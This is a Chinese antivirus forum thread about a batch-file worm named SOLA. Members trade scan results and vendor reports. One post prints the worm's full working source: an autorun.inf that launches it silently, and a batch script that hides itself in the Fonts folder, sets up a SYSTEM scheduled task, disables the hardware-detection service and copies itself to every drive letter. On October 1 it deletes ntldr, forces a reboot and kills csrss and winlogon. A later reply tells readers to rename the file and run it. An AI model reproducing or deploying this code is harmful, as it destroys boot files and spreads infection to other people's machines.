一个sola，看来还是过了不少

schumi小粉

已经上报eset

http://samples.eset.com.cn/index ... 16b797aa8e3deb261ed



http://www.virustotal.com/file-s ... 34686b4a-1310862995

C.C.

360SD
C:\Documents and Settings\Administrator\桌面\fg.zip=>fg.com        恶意程序(BAT.Agent.F)        已删除

dljsxyls

[autorun]
　　shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
　　shell=打开(&O)
　　shell\open=复制磁盘(&C)
　　shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
　　shell\open\Default=1
　　shell\explore=资源管理器(&X)
　　shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
　　病毒会在字体目录生成衍生物
　　%systemroot%\Fonts\Regedit.reg
　　%systemroot%\Fonts\sleep.exe
　　%systemroot%\Fonts\SOLA.BAT
　　%systemroot%\Fonts\est_type2032.fon
　　会在字体目录生成个文件夹
　　%systemroot%\Fonts\solasetup
　　会在任务计划目录生成衍生物
　　%systemroot%\Tasks\Tasks.job
　　病毒代码
　　－－－－－
　　@echo off
　　set sola=%systemroot%\Fonts
　　set setup=%systemroot%\Fonts\solasetup
　　if not "%1"=="-USB" goto Start
　　start /max ..
　　if exist %sola%\SOLA.BAT goto End
　　::========================Infect==============================
　　:Infect
　　cd\
　　md %systemroot%\Fonts\solasetup
　　::————文件复制---------
　　copy sola\Autorun.inf %setup%\Autorun.inf
　　copy sola\SOLA.BAT %setup%\SOLA.BAT
　　copy sola\宅男请进.RAR %setup%\宅男请进.RAR
　　copy sola\Tasks.xxx %setup%\Tasks.xxx
　　copy sola\sleep.exe %setup%\sleep.exe
　　tasklist >%sola%\task.txt
　　FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
　　copy %systemroot%\system32\cmd.exe %sola%\%svchost%
　　del %sola%\task.txt
　　:Tasks
　　copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job
　　schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
　　goto TaskSuc
　　:TaskFail
　　%homedrive%
　　cd "%ALLUSERSPROFILE%"
　　cd 「开始」菜单\程序\启动
　　echo On Error Resume Next>SOLA.VBS
　　echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS
　　echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS
　　copy SOLA.VBS %sola%\SOLA.VBS
　　echo NT>%systemroot%\Fonts\NoTasks
　　:TaskSuc
　　attrib %systemroot%\Tasks\Tasks.job +s +h +r
　　copy %setup%\sola.bat %sola%\sola.bat
　　copy %setup%\sleep.exe %systemroot%\system32\sleep.exe
　　:NoAutoPlay
　　net stop "Shell Hardware Detection"
　　echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg
　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg
　　echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg
　　start regedit /s %systemroot%\Fonts\Regedit.reg
　　:KillTMG
　　goto End
　　::======================Infect======================================
　　::======================Start=======================================
　　:Start
　　%homedrive%
　　cd "%ALLUSERSPROFILE%"
　　cd 「开始」菜单\程序\启动
　　date /t >%sola%\est_type2032.fon
　　findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn
　　if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
　　:Continue
　　sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\Autorun.inf&copy /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA&copy /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r
　　sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1 attrib -s -h -r D:\Autorun.inf&copy /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA&copy /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r
　　sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1 attrib -s -h -r E:\Autorun.inf&copy /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA&copy /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r
　　sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1 attrib -s -h -r F:\Autorun.inf&copy /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA&copy /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r
　　sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1 attrib -s -h -r G:\Autorun.inf&copy /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA&copy /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r
　　if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
　　sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1 attrib -s -h -r H:\Autorun.inf&copy /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA&copy /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r
　　sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1 attrib -s -h -r I:\Autorun.inf&copy /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA&copy /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r
　　sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1 attrib -s -h -r J:\Autorun.inf&copy /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA&copy /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r
　　sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1 attrib -s -h -r K:\Autorun.inf&copy /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA&copy /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r
　　sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1 attrib -s -h -r L:\Autorun.inf&copy /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA&copy /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r
　　sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1 attrib -s -h -r M:\Autorun.inf&copy /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA&copy /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r
　　sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1 attrib -s -h -r N:\Autorun.inf&copy /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA&copy /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r
　　if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
　　sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1 attrib -s -h -r O:\Autorun.inf&copy /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA&copy /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r
　　sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1 attrib -s -h -r P:\Autorun.inf&copy /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA&copy /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r
　　sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1 attrib -s -h -r Q:\Autorun.inf&copy /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA&copy /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r
　　sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1 attrib -s -h -r R:\Autorun.inf&copy /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA&copy /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r
　　sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1 attrib -s -h -r S:\Autorun.inf&copy /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA&copy /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r
　　if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
　　sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1 attrib -s -h -r T:\Autorun.inf&copy /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA&copy /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r
　　sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1 attrib -s -h -r U:\Autorun.inf&copy /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA&copy /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r
　　sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1 attrib -s -h -r V:\Autorun.inf&copy /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA&copy /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r
　　sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1 attrib -s -h -r W:\Autorun.inf&copy /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA&copy /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r
　　sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1 attrib -s -h -r X:\Autorun.inf&copy /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA&copy /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r
　　sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1 attrib -s -h -r Y:\Autorun.inf&copy /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA&copy /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r
　　sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1 attrib -s -h -r Z:\Autorun.inf&copy /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA&copy /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r
　　if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
　　%systemdrive%
　　sleep 5000
　　goto Start
　　:DayOn
　　attrib %systemdrive%\ntldr -s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的计算机上带有SOLA病毒，今天是它的发作日期。病毒已经破坏了您的系统，您的计算机将在10秒钟后重启。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"
　　sleep 10000
　　if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"
　　goto Start
　　::=====================Start=========================================
　　:End

windows 7下无法正常运行

留侯

大蜘蛛clean，已上报。

schumi小粉

dljsxyls 发表于 2011-7-17 08:48
[autorun]
　　shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SO ...

你改成bat为后缀的，运行~

maomao110

看到多引擎  AVG Miss   我就不下了

IOOOOI

VBS.Runauto
诺顿KILL。

电影结束了

XP下没法运行。。。

Mr.Tong

pass kis2012

星晨

BitDefender 上报